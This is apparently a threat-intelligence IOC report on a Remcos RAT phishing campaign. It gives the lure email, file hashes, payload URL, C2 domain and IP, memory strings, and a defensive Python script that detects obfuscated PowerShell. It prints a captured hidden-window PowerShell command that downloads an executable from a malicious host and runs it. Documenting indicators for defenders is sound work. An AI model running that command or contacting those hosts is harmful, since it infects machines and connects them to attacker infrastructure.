2021-10-14 Remcos IOCs
THREAT IDENTIFICATION: REMCOS
SUBJECTS OBSERVED
ACH Remittance Advice
Separate Remittance Advice
SENDERS OBSERVED
EMAIL BODY
Payment receipt
Invoice #2020821
for ACH Remittance Advice
Paid on OCTOBER 14,2021
The Ink Supplies Corp
2093 PHILADELPHIA PIKE #5003
Claymont, Delaware 19703
United States
Kindly confirm receipt
Best Regards,
Accounts Payable
MALDOC FILE HASHES
Deposit Confirmation.xls
9bbb45d378b57d02424fc197a7ea7669
travelespecially.cmd
5ea928ce876726d313001f5cbd14bc65
POWERSHELL FROM MALDOC
C:\Users\analyst\Documents\samples>powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://greenpayindia.com/wp-conternt/ConsoleApp18.e`xe -Destination C:\Users\Public\Documents\brotherneed.e`xe;C:\Users\Public\Documents\brotherneed.e`xe
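As an added defender-side example (not part of this IOC file): the command above hides "http" and "exe" behind PowerShell backticks, which the parser silently drops but naive substring matching does not. The script below resolves that escaping the way PowerShell does, then flags the hidden-window, download-to-disk and execute-the-download pattern. Its only input is the command line recorded on this page, re-joined onto one line with the analyst's prompt removed; the cmdlet list and the finding names are my own choices.

```python
import re

# Sample input, taken from the POWERSHELL FROM MALDOC entry above, joined onto
# one line (the capture was wrapped at terminal width). The "C:\...>" prompt
# belongs to the analyst's shell, not to the command, so it is omitted.
OBSERVED_COMMAND_LINE = (
    r"powershell -w hi sleep -Se 31;Start-BitsTransfer -Source "
    r"htt`p://greenpayindia.com/wp-conternt/ConsoleApp18.e`xe -Destination "
    r"C:\Users\Public\Documents\brotherneed.e`xe;C:\Users\Public\Documents\brotherneed.e`xe"
)

# Escape sequences a backtick legitimately introduces in Windows PowerShell.
# A backtick before any other character is a no-op for the parser, which is
# why "htt`p" and "e`xe" still run but evade a literal match on "http"/"exe".
_PS_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "0": "\0",
               "a": "\a", "b": "\b", "f": "\f", "v": "\v"}

# Cmdlets / methods commonly used to pull a file from the network (my list).
_DOWNLOAD_CMDLETS = ("start-bitstransfer", "invoke-webrequest",
                     "downloadfile", "downloadstring", "net.webclient")


def normalize_backticks(cmd: str) -> str:
    """Return the command as PowerShell's parser sees it (backtick escapes resolved)."""
    out = []
    i = 0
    while i < len(cmd):
        ch = cmd[i]
        if ch == "`" and i + 1 < len(cmd):
            nxt = cmd[i + 1]
            out.append(_PS_ESCAPES.get(nxt, nxt))  # unknown escape => bare char
            i += 2
            continue
        out.append(ch)
        i += 1
    return "".join(out)


def analyze_command_line(raw: str) -> dict:
    """Flag the download-then-execute chain in a logged PowerShell command line."""
    cmd = normalize_backticks(raw)
    lower = cmd.lower()
    findings = {
        "normalized": cmd,
        "obfuscated_backticks": "`" in raw,
        # -w hi / -WindowStyle Hidden (prefix abbreviations are accepted)
        "hidden_window": bool(re.search(r"-w[indowstyle]*\s+h[iden]*\b", lower)),
        "download_cmdlet": next((c for c in _DOWNLOAD_CMDLETS if c in lower), None),
        "urls": re.findall(r"https?://[^\s;'\"]+", cmd, flags=re.IGNORECASE),
    }
    m = re.search(r"-destination\s+([^\s;]+)", cmd, flags=re.IGNORECASE)
    dest = m.group(1) if m else None
    findings["destination"] = dest
    # The downloaded file is executed when its path reappears as a statement.
    findings["executes_download"] = bool(dest) and any(
        stmt.strip().lower() == dest.lower() for stmt in cmd.split(";")
    )
    findings["suspicious"] = (findings["download_cmdlet"] is not None
                              and findings["executes_download"])
    return findings


if __name__ == "__main__":
    for key, value in analyze_command_line(OBSERVED_COMMAND_LINE).items():
        print(f"{key}: {value}")
```

Run the normalization before any string or regex match on command-line telemetry (Sysmon event 1, 4688 with command-line auditing, or script block logs); matching the raw text would miss every indicator above except the domain.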
PAYLOAD DOWNLOAD URL
http://greenpayindia.com/wp-conternt/ConsoleApp18.exe
REMCOS PAYLOAD FILE HASH
brotherneed.exe
aade455507f667318c83c42a95b3fc3c
It was renamed and copied as:
notepad.exe
aade455507f667318c83c42a95b3fc3c
REMCOS C2
lplazadtemins.duckdns.org:443
194.147.140.45:443
SUPPORTING EVIDENCE
https://tria.ge/211014-ye79wababj
STRINGS IN MEMORY
0x4603dc (16): Remcos_Mutex_Inj
0x460420 (24): Remcos Agent initialized
0x4656cc (29): Remcos restarted by watchdog!
0x465d24 (11): * Remcos v
0x46c628 (13): Remcos-NLSDTO
0x5f83d8 (23): Software\Remcos-NLSDTO\